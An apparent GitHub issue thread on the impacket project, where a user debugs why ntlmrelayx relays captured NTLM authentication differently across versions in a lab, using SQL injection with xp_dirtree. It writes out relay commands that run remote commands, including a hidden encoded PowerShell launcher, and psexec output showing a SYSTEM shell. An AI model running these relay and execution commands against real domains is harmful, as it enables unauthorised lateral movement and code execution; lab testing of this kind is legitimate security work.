ntlmrelayx gives different output on different versions

[Althibyani]

Configuration

impacket version: v0.11.0 & v0.9.24
Python version: 3

attacker machine: 10.10.10.100 kali linux 2023.3
SQL01 = 10.11.12.21
SQL02 = 10.11.12.22

The idea as follow:

• I have SQLi on SQL01 server. The MSsql service is running in context of sql-svc service account (domain env)

• Service Account SQL-SVC has high privileges on both SQL01 & SQL02 (I added him to local administrators group)

• Both machines has signing off

• So, by setting up ntlmrelayx.py on kali linux, we can use xp_dirtree to access \10.10.10.100\fakeshare share on kali from SQL01 to target SQL02 using the ntlmrelayx.py since sql-svc has high privileges.

• The normal result is a success attack that gave me a Command execution on SQL02

The problem is , this attack went successfully using Impacket 0.9.24. But it did work uing Impacket 0.11.0 & 0.10.0

In 0.9.24 the relay received the first auth request which was SQL01$ machine Account l, I know that the MSSQL is running in context for SQL-SVC user but I do not know why I received request from SQL01$ first. However Since it does have any privileges on SQL02 the next step is failed which is the command execution.

The good thing in 0.9.24 it keeps receive the second auth request which this time is from SQL-SVC and the whole attack will succeed.

But for 0.10.0 & 0.11.0 the attack stopped completely after first request which is basically will fail to execute cuz SQL01$ machine account does not have any privileges on SQL02. Here the attack stops and not continuing to receive the second request like what happened with 0.9.24

please check photo bellow to understand more

Impacket 0.11.0

Imapcket 0.9.24

So, where is the issue here?

[0xdeaddood]

Hi @Althibyani!

How are you running ntlmrelayx.py in v0.10.0? What flags are you setting?

In that version, we introduced some changes in the default behavior of the example regarding the multi-relay feature. I think your problem might be related to that.

Please check this blogpost for more information.

[Althibyani]

Hi @0xdeaddood

I have kali 2023.3 with 2 Snapshots. one with Impacket v0.11.0 installed, and one with v0.9.23

Some versions have been tested on kali 2022.4 as well with same results

This was my command on all tested versions "v0.9.24, v0.10.0 & v0.11.0"

proxychains -q ntlmrelayx.py -t ip -smb2support --no-http-server -c "whoami > C:\output.txt"

v0.9.24 = works fine and catch two auth, SQL01$ & SQL-SVC which is the needed account to complete the attack.

v0.10.0 & v0.11.0 = both of versions, the relay stopped after first auth "SQL01$" failed to execute commands. not like v0.9.24 which continue to relay until it gets the right user which is SQL-SVC.

[0xdeaddood]

You can try setting a named target (DOMAIN\SQL-SVC@IP)

[Althibyani]

You can try setting a named target (DOMAIN\SQL-SVC@IP)

Hi @0xdeaddood,

Thank you for replay. I already tried, and I tried again just a few minutes ago.

proxychains -q ntlmrelayx.py -t testlab\sql-svc@10.11.12.22 -smb2support --no-http-server -c "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByA......[snip]" 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-5 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-6 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!

The command did not get executed on 10.14.15.21. However, still same result even with different ways, v0.9.23 worked completely fine.

Just to make sure that SQL-SVC already has a privilege to execute commands on 10.11.12.21 and no issues in the LAB itself.

└─$ proxychains -q psexec.py testlab/sql-svc@10.11.12.21
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.11.12.21.....
[*] Found writable share ADMIN$
[*] Uploading file ANElfRhV.exe
[*] Opening SVCManager on 10.11.12.21.....
[*] Creating service zDrv on 10.11.12.21.....
[*] Starting service zDrv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

[anadrianmanrique]

I think the correct command line args are:
ntlmrelayx.py -t TESTLAB/SQL-SVC@10.11.12.22

[anadrianmanrique]

@Althibyani please recheck after #1741. Thanks